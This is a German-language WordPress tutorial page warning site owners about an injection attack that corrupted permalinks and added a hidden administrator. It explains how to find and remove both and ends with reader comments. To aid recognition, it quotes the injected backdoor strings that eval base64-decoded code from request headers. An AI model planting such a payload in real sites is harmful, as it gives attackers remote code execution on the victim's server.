Trusted WordPress tutorials, when you need them most.
Beginner’s Guide to WordPress
WPB Cup
25 Million+
Websites using our plugins
16+
Years of WordPress experience
3000+
WordPress tutorials
by experts

WordPress SQL Injection – Neuester Angriff

Hinweis der Redaktion: Wir erhalten eine Provision für Partnerlinks auf WPBeginner. Die Provisionen haben keinen Einfluss auf die Meinung oder Bewertung unserer Redakteure. Erfahre mehr über Redaktioneller Prozess.

Viele Websites sind in letzter Zeit von einem SQL-Angriff betroffen, bei dem Codes in Ihre Website injiziert werden. Diese MySQL-Injektion wirkt sich auf Ihre Permalinks aus und macht sie unwirksam. Infolgedessen funktionieren die URLs Ihrer Blogbeiträge nicht. Zahlreiche WordPress-Blogs waren von diesem Angriff betroffen. Vielen Dank an Andy Soward, der uns darauf aufmerksam gemacht hat.

Durch diesen Angriff wurde einer der folgenden Codes zu Ihrer Permalink-Struktur hinzugefügt:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Diese Anführungszeichen fügen alle Permalinks auf Ihrer Website ein und können nur geändert werden, wenn sie manuell entfernt werden.

Um dies zu beheben, gehen Sie zu:

Einstellungen > Permalinks und entfernen Sie den obigen Code und ersetzen Sie ihn durch Ihren Standardcode.

Als nächstes müssen Sie zu Benutzer gehen. Sie werden sehen, dass es mehr als einen Administrator gibt. Sie sehen zwar nicht deren Namen, aber die Anzahl ist erhöht. Sehen Sie sich also alle Benutzer an und suchen Sie denjenigen, der sich zuletzt registriert hat. Fahren Sie mit der Maus über diesen Benutzer und rufen Sie den Link auf. Ändern Sie den Code userid=, indem Sie 1 zu dieser Zahl hinzufügen. Wenn also der letzte Benutzer, den Sie sehen können, Benutzer Nr. 2 war, fügen Sie 1 hinzu und machen Sie daraus 3. Sie sollten feststellen, dass der versteckte Administrator einen seltsamen Code als Vornamen hat. Löschen Sie den Code und machen Sie ihn zu einem Abonnenten. Kehren Sie dann zurück und löschen Sie ihn.

Damit sollte das Problem behoben sein. Sie können ihn auch löschen, indem Sie einfach zu Ihrem PHPMyAdmin gehen. Denn dort sehen Sie den Benutzer.

Wir wollten diese Nachricht so schnell wie möglich verbreiten, damit unsere Benutzer auf dem Laufenden sind. Bitte vergewissern Sie sich, dass Ihr Blog nicht infiziert ist. Wir hoffen, dass WordPress bald eine neue Version herausbringt.

Auch wenn Sie nicht einige dieser Maßnahmen zur Sicherung Ihres WordPress-Admin-Bereichs implementiert haben.

Offenlegung: Unsere Inhalte werden von unseren Lesern unterstützt. Das bedeutet, dass wir möglicherweise eine Provision verdienen, wenn Sie auf einige unserer Links klicken. Mehr dazu erfahren Sie unter Wie WPBeginner finanziert wird , warum das wichtig ist und wie Sie uns unterstützen können. Hier finden Sie unseren redaktionellen Prozess .

Das ultimative WordPress Toolkit

Erhalte KOSTENLOSEN Zugang zu unserem Toolkit - eine Sammlung von WordPress-bezogenen Produkten und Ressourcen, die jeder Profi haben sollte!

Reader Interactions

9 KommentareEine Antwort hinterlassen

  1. Syed Balkhi says

    Hey WPBeginner readers,
    Did you know you can win exciting prizes by commenting on WPBeginner?
    Every month, our top blog commenters will win HUGE rewards, including premium WordPress plugin licenses and cash prizes.
    You can get more details about the contest from here.
    Start sharing your thoughts below to stand a chance to win!

  2. ahmed_alaaedin says

    The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!

  3. a wordpress user says

    i was hit by this twice.

    first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.

    once they restore my a/c i will remove wordpres.. I have had it!

    • Editorial Staff says

      We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.

      Admin

      • lerrkin says

        Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was „Page not cached by WP Super Cache. No closing HTML tag. Check your theme“.
        So last Super Cache ver. promises to do not html validity check.

        Oh, I’m reading!
        Thanks a lot!

Eine Antwort hinterlassen

Danke, dass du einen Kommentar hinterlassen möchtest. Bitte beachte, dass alle Kommentare nach unseren kommentarpolitik moderiert werden und deine E-Mail-Adresse NICHT veröffentlicht wird. Bitte verwende KEINE Schlüsselwörter im Namensfeld. Lass uns ein persönliches und sinnvolles Gespräch führen.